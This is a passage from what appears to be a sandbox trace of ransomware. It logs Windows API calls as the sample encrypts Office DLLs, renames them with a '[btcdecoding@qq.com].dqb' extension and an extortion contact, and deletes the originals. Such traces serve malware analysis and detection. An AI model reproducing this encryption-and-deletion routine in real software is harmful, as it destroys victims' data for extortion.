Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0057.682] lstrlenW (lpString=".dbf") returned 4 [0057.682] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0057.682] lstrlenW (lpString=".1cd") returned 4 [0057.682] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.682] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0057.682] lstrlenW (lpString=".jpg") returned 4 [0057.682] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0057.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0057.683] lstrlenW (lpString=".doc") returned 4 [0057.683] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0057.683] lstrlenW (lpString=".docx") returned 5 [0057.683] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1 [0057.683] lstrlenW (lpString=".pdf") returned 4 [0057.683] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0057.683] lstrlenW (lpString=".xls") returned 4 [0057.683] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0057.683] lstrlenW (lpString=".xlsx") returned 5 [0057.683] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1 [0057.683] lstrlenW (lpString=".ppt") returned 4 [0057.683] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0057.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0057.683] lstrlenW (lpString=".zip") returned 4 [0057.683] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0057.683] lstrlenW (lpString=".rar") returned 4 [0057.683] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0057.683] lstrlenW (lpString=".bz2") returned 4 [0057.683] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0057.683] lstrlenW (lpString=".7z") returned 3 [0057.683] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0057.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0057.683] lstrlenW (lpString=".dbf") returned 4 [0057.683] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0057.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0057.683] lstrlenW (lpString=".1cd") returned 4 [0057.683] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0057.683] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACER3X.DLL") returned 66 [0057.683] lstrlenW (lpString=".jpg") returned 4 [0057.683] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0057.684] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0057.684] lstrlenW (lpString="ACETXT.DLL") returned 10 [0057.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.684] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=297360) returned 1 [0057.684] CloseHandle (hObject=0x230) returned 1 [0057.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll")) returned 0x20 [0057.684] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0057.684] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0057.684] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.685] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0057.685] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x204 [0057.685] GetLastError () returned 0x0 [0057.685] ReadFile (in: hFile=0x230, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x48990, lpOverlapped=0x0) returned 1 [0057.692] WriteFile (in: hFile=0x204, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x489a0, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x489a0, lpOverlapped=0x0) returned 1 [0057.794] ReadFile (in: hFile=0x230, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0057.794] WriteFile (in: hFile=0x204, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xe8, lpOverlapped=0x0) returned 1 [0057.794] SetEndOfFile (hFile=0x204) returned 1 [0058.073] CloseHandle (hObject=0x204) returned 1 [0058.074] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.074] SetEndOfFile (hFile=0x230) returned 1 [0058.077] CloseHandle (hObject=0x230) returned 1 [0058.077] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0058.077] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acetxt.dll")) returned 1 [0058.077] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0058.077] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0058.077] lstrlenW (lpString=".doc") returned 4 [0058.077] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.077] lstrlenW (lpString=".docx") returned 5 [0058.077] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0058.077] lstrlenW (lpString=".pdf") returned 4 [0058.077] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.077] lstrlenW (lpString=".xls") returned 4 [0058.077] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.077] lstrlenW (lpString=".xlsx") returned 5 [0058.077] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0058.077] lstrlenW (lpString=".ppt") returned 4 [0058.077] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.077] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0058.077] lstrlenW (lpString=".zip") returned 4 [0058.077] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.077] lstrlenW (lpString=".rar") returned 4 [0058.077] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.078] lstrlenW (lpString=".bz2") returned 4 [0058.078] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.078] lstrlenW (lpString=".7z") returned 3 [0058.078] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0058.078] lstrlenW (lpString=".dbf") returned 4 [0058.078] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0058.078] lstrlenW (lpString=".1cd") returned 4 [0058.078] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0058.078] lstrlenW (lpString=".jpg") returned 4 [0058.078] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0058.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0058.078] lstrlenW (lpString=".doc") returned 4 [0058.078] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0058.078] lstrlenW (lpString=".docx") returned 5 [0058.078] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0058.078] lstrlenW (lpString=".pdf") returned 4 [0058.078] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0058.078] lstrlenW (lpString=".xls") returned 4 [0058.078] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0058.078] lstrlenW (lpString=".xlsx") returned 5 [0058.078] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0058.078] lstrlenW (lpString=".ppt") returned 4 [0058.078] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0058.078] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0058.078] lstrlenW (lpString=".zip") returned 4 [0058.078] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0058.078] lstrlenW (lpString=".rar") returned 4 [0058.078] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0058.079] lstrlenW (lpString=".bz2") returned 4 [0058.079] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0058.079] lstrlenW (lpString=".7z") returned 3 [0058.079] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0058.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0058.079] lstrlenW (lpString=".dbf") returned 4 [0058.079] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0058.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0058.079] lstrlenW (lpString=".1cd") returned 4 [0058.079] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0058.079] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACETXT.DLL") returned 66 [0058.079] lstrlenW (lpString=".jpg") returned 4 [0058.079] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0058.079] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0058.079] lstrlenW (lpString="ACEWDAT.DLL") returned 11 [0058.079] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0058.080] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=3050912) returned 1 [0058.080] CloseHandle (hObject=0x230) returned 1 [0058.080] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll")) returned 0x20 [0058.080] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0058.080] MoveFileW (lpExistingFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll"), lpNewFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 1 [0058.081] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\acewdat.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0058.081] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0x0) returned 1 [0058.081] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0058.081] ReadFile (in: hFile=0x230, lpBuffer=0x3db0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3db0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0058.145] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xf848a, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0058.145] ReadFile (in: hFile=0x230, lpBuffer=0x3df0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3df0058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0058.153] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x32bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0058.153] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x2a8da0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc2c | out: lpNewFilePointer=0x0) returned 1 [0058.153] ReadFile (in: hFile=0x230, lpBuffer=0x3e30058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32bfc38, lpOverlapped=0x0 | out: lpBuffer=0x3e30058*, lpNumberOfBytesRead=0x32bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0058.177] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0058.178] WriteFile (in: hFile=0x230, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x32bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfcb0*=0xc0102, lpOverlapped=0x0) returned 1 [0058.195] SetEndOfFile (hFile=0x230) returned 1 [0060.035] RtlAllocateHeap (HeapHandle=0x570000, Flags=0x0, Size=0x40000) returned 0x39006c0 [0060.038] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0060.038] WriteFile (in: hFile=0x230, lpBuffer=0x39006c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x39006c0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0060.040] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0xf848a, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0060.040] WriteFile (in: hFile=0x230, lpBuffer=0x39006c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x39006c0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0060.045] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x2a8da0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfc7c | out: lpNewFilePointer=0x0) returned 1 [0060.045] WriteFile (in: hFile=0x230, lpBuffer=0x39006c0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32bfc88, lpOverlapped=0x0 | out: lpBuffer=0x39006c0*, lpNumberOfBytesWritten=0x32bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0060.047] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x39006c0 | out: hHeap=0x570000) returned 1 [0060.047] CloseHandle (hObject=0x230) returned 1 [0060.092] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0060.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0060.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0060.146] lstrlenW (lpString=".doc") returned 4 [0060.146] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.146] lstrlenW (lpString=".docx") returned 5 [0060.146] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0060.146] lstrlenW (lpString=".pdf") returned 4 [0060.146] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.146] lstrlenW (lpString=".xls") returned 4 [0060.146] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.146] lstrlenW (lpString=".xlsx") returned 5 [0060.146] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0060.146] lstrlenW (lpString=".ppt") returned 4 [0060.146] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0060.146] lstrlenW (lpString=".zip") returned 4 [0060.146] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.146] lstrlenW (lpString=".rar") returned 4 [0060.146] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.146] lstrlenW (lpString=".bz2") returned 4 [0060.146] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.146] lstrlenW (lpString=".7z") returned 3 [0060.146] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0060.146] lstrlenW (lpString=".dbf") returned 4 [0060.146] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0060.146] lstrlenW (lpString=".1cd") returned 4 [0060.146] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.146] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0060.146] lstrlenW (lpString=".jpg") returned 4 [0060.147] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0060.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0060.147] lstrlenW (lpString=".doc") returned 4 [0060.147] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0060.147] lstrlenW (lpString=".docx") returned 5 [0060.147] lstrcmpiW (lpString1=".docx", lpString2="T.DLL") returned -1 [0060.147] lstrlenW (lpString=".pdf") returned 4 [0060.147] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0060.147] lstrlenW (lpString=".xls") returned 4 [0060.147] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1 [0060.147] lstrlenW (lpString=".xlsx") returned 5 [0060.147] lstrcmpiW (lpString1=".xlsx", lpString2="T.DLL") returned -1 [0060.147] lstrlenW (lpString=".ppt") returned 4 [0060.147] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1 [0060.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0060.147] lstrlenW (lpString=".zip") returned 4 [0060.147] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1 [0060.147] lstrlenW (lpString=".rar") returned 4 [0060.147] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1 [0060.147] lstrlenW (lpString=".bz2") returned 4 [0060.147] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1 [0060.147] lstrlenW (lpString=".7z") returned 3 [0060.147] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1 [0060.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0060.147] lstrlenW (lpString=".dbf") returned 4 [0060.147] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1 [0060.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0060.147] lstrlenW (lpString=".1cd") returned 4 [0060.147] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0060.147] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ACEWDAT.DLL") returned 67 [0060.147] lstrlenW (lpString=".jpg") returned 4 [0060.147] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0060.148] lstrcmpiW (lpString1=".DLL", lpString2=".dqb") returned -1 [0060.148] lstrlenW (lpString="ATLCONV.DLL") returned 11 [0060.148] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0060.954] GetFileSizeEx (in: hFile=0x1e4, lpFileSize=0x32bff1c | out: lpFileSize=0x32bff1c*=385368) returned 1 [0060.954] CloseHandle (hObject=0x1e4) returned 1 [0060.954] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll")) returned 0x20 [0060.954] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0060.954] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1e4 [0060.955] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0060.955] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0060.955] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0060.955] GetLastError () returned 0x0 [0060.955] ReadFile (in: hFile=0x1e4, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x5e158, lpOverlapped=0x0) returned 1 [0061.758] WriteFile (in: hFile=0x21c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0x5e160, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0x5e160, lpOverlapped=0x0) returned 1 [0061.766] ReadFile (in: hFile=0x1e4, lpBuffer=0x3db0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x32bfed4, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesRead=0x32bfed4*=0x0, lpOverlapped=0x0) returned 1 [0061.766] WriteFile (in: hFile=0x21c, lpBuffer=0x3db0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x32bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3db0020*, lpNumberOfBytesWritten=0x32bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0061.766] SetEndOfFile (hFile=0x21c) returned 1 [0061.766] CloseHandle (hObject=0x21c) returned 1 [0061.766] SetFilePointerEx (in: hFile=0x1e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32bfec8 | out: lpNewFilePointer=0x0) returned 1 [0061.766] SetEndOfFile (hFile=0x1e4) returned 1 [0061.770] CloseHandle (hObject=0x1e4) returned 1 [0061.770] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0061.770] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\atlconv.dll")) returned 1 [0061.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0061.770] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\ATLCONV.DLL") returned 67 [0061.770] lstrlenW (lpString=".doc") returned 4 [0061.771] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1 [0061.771] lstrlenW (lpString=".docx") returned 5 [0061.771] lstrcmpiW (lpString1=".docx", lpString2="V.DLL") returned -1 [0061.771] lstrlenW (lpString=".pdf") returned 4 [0061.771] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1 [0061.771] 